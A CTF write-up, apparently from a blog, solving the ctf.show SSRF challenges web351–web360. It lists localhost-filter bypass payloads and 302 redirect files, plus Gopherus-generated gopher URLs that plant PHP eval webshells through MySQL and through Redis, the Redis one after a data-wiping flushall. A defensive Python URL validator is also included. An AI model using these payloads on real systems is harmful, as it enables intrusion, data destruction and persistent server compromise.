Challenge address: https://ctf.show/challenges
Ugh, over the New Year holiday I was constantly being dragged here and there; every time I finally had an idea for a challenge I got called away. That is really unfriendly to a newbie like me: just as I was starting to get it, a few days of fun set me back to square one and I have forgotten everything again......
SSRF (Server-Side Request Forgery) is a vulnerability in which an attacker crafts a request that is then issued by the server itself. Typically the target of an SSRF attack is an internal system that cannot be reached from the outside (precisely because the request originates on the server, it can reach internal systems that are connected to the server but isolated from the external network).

web351

Source:

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?> 

There is a flag.php page; visiting it returns a message saying you are not a local user, so clearly we are meant to request 127.0.0.1/flag.php as the local user.
Construct the payload: url=http://127.0.0.1/flag.php

web352

localhost and 127.0.0 are filtered.
The payload from the previous challenge still works,
or use 127.0.1, 127.1, 127.0.0.1, or convert the address to hexadecimal or binary.
Base converter: https://tool.520101.com/wangluo/jinzhizhuanhuan/

web353

Base conversion works here too, or:

Hexadecimal
url=http://0x7F.0.0.1/flag.php
Octal
url=http://0177.0.0.1/flag.php
Decimal integer format
url=http://2130706433/flag.php
Hexadecimal integer format (convert with the site above; remember the 0x prefix)
url=http://0x7F000001/flag.php
There is also a special abbreviated form:
127.0.0.1 written as 127.1
Bypassing the localhost filter with the CIDR block (any 127.x.x.x address) or the zero address:
url=http://127.127.127.127/flag.php
url=http://0/flag.php
url=http://0.0.0.0/flag.php
payload: url=http://127.1/flag.php

web354

if($x['scheme']==='http'||$x['scheme']==='https'){
    if(!preg_match('/localhost|1|0|。/i', $url)){

302 redirect; set one up on a VPS:

<?php
header("Location: http://127.0.0.1/flag.php");

POST: url=http://your-domain/ssrf/302.php
Master Y4 found a site whose A record points to 127.0.0.1: http://sudo.cc/, so you don't need to set up DNS of your own
(I found that a hassle too and just used it directly)
payload: url=http://sudo.cc/flag.php

web355

The challenge adds the restriction $host<5, i.e. the host must be shorter than 5 characters, so http://127.1/flag.php works directly.
payload: url=http://127.1/flag.php

web356

Brutal: now the restriction is $host<3,
payload: url=http://0/flag.php
0 resolves to 127.0.0.1 on Linux and to 0.0.0.0 on Windows.

web357

Either a 302 redirect or DNS rebinding works.
Create a file bit.php on your own server with the following content:

<?php
header("Location:http://127.0.0.1/flag.php"); 

Then use the address of that file as the payload.
payload: http://xxx/bit.php
I'll only cover this approach here; I haven't really looked into the other one...

web358

The regex requires the URL to start with http://ctf. and end with show.
payload:url=http://ctf.@127.0.0.1/flag.php?show
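As an added example (not part of the original write-up), here is a defender-side host check that catches every bypass used from web352 to web358: it takes the host from a properly parsed URL, normalises inet_aton shorthand the way curl will, resolves names, and matches every resulting address against a blocklist. The resolver is injected so the demo runs offline; FAKE_DNS and files.example are constructed.

```python
import ipaddress
from urllib.parse import urlsplit

# Ranges the fetcher must never reach, however the URL happens to spell them.
BLOCKED = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "::1/128", "::/128", "fc00::/7", "fe80::/10")]

def parse_legacy_ipv4(host):
    """Canonicalise inet_aton-style shorthand (127.1, 0177.0.0.1, 0x7F.0.0.1,
    2130706433, 0x7F000001, 0) the way libc/curl will; None if not numeric."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:  # each label may be hex (0x..), octal (leading 0) or decimal
        vals = [int(p[2:], 16) if p[:2].lower() == "0x" else
                int(p, 8 if len(p) > 1 and p[0] == "0" else 10) for p in parts]
        tail = 8 * (5 - len(parts))  # the last label fills all remaining bytes
        n = (int.from_bytes(bytes(vals[:-1]), "big") << tail) | vals[-1]
    except ValueError:  # non-numeric label, or a leading label outside 0..255
        return None
    return ipaddress.IPv4Address(n) if 0 <= vals[-1] < 1 << tail else None

def check_target(url, resolver):
    """Return (allowed, addresses) for an http(s) URL. The host is taken from the
    parsed URL (so 'ctf.@127.0.0.1' is 127.0.0.1), normalised, resolved, matched.
    resolver(name) -> set of ip_address objects; in production wrap getaddrinfo."""
    u = urlsplit(url)
    if u.scheme not in ("http", "https") or not u.hostname:
        return False, []
    addr = parse_legacy_ipv4(u.hostname)
    try:
        addrs = {addr} if addr is not None else {ipaddress.ip_address(u.hostname)}
    except ValueError:
        addrs = resolver(u.hostname)  # a name: every record counts (sudo.cc -> 127.0.0.1)
    addrs = {getattr(a, "ipv4_mapped", None) or a for a in addrs}  # ::ffff:127.0.0.1
    allowed = bool(addrs) and not any(a in net for a in addrs for net in BLOCKED)
    return allowed, sorted(map(str, addrs))

# Constructed stand-in for DNS so the demo runs offline: sudo.cc is the page's
# example of a public name whose A record is 127.0.0.1; files.example is made up.
FAKE_DNS = {"sudo.cc": {ipaddress.ip_address("127.0.0.1")},
            "files.example": {ipaddress.ip_address("198.51.100.7")}}

def demo():
    urls = ["http://127.1/flag.php", "http://0177.0.0.1/flag.php", "http://0/flag.php",
            "http://2130706433/flag.php", "http://ctf.@127.0.0.1/flag.php?show",
            "http://sudo.cc/flag.php", "http://[::ffff:127.0.0.1]/flag.php",
            "http://files.example/report"]
    return {u: check_target(u, lambda h: FAKE_DNS.get(h, set())) for u in urls}
```

The check has to be repeated for every redirect hop (the 302 trick used in web354 and web357), and the fetcher should connect to the address that was validated rather than re-resolving the name, since a second lookup returning a different record is exactly what DNS rebinding exploits.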

web359

root@xl-bit:~/CTF/Gopherus# python gopherus.py --exploit mysql


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

        author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: root
Give query to execute: select '<?php eval($_POST[bit]); ?>' INTO OUTFILE '/var/www/html/bit.php';          

Your gopher link is ready to do SSRF : 

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4c%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%70%61%73%73%5d%29%3b%20%3f%3e%27%20%49%4e%54%4f%20%4f%55%54%46%49%4c%45%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%62%69%74%2e%70%68%70%27%3b%01%00%00%00%01

-----------Made-by-SpyD3r-----------

Then submit it to check.php.
URL-encode the part after the underscore once more, then:
post: returl=xxxxx
and the webshell is written.
Connect with AntSword (蚁剑), find flag.txt and you have the flag.

web360

Use gopher to hit Redis
python gopherus.py --exploit redis
Choose PHP first
Content: <?php eval($_POST[bit]); ?>

root@xl-bit:~/CTF/Gopherus# python gopherus.py --exploit redis

Ready To get SHELL

What do you want?? (ReverseShell/PHPShell): php

Give web root location of server (default is /var/www/html): 
Give PHP Payload (We have default PHP Shell): <?php eval($_POST[bit]);?>

Your gopher link is Ready to get PHP Shell: 

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2430%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Bbit%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter. 

-----------Made-by-SpyD3r-----------

The remaining steps are much the same; poke around a little and the flag turns up.

-------------------------------------SSRF section: done--------------------------------------------
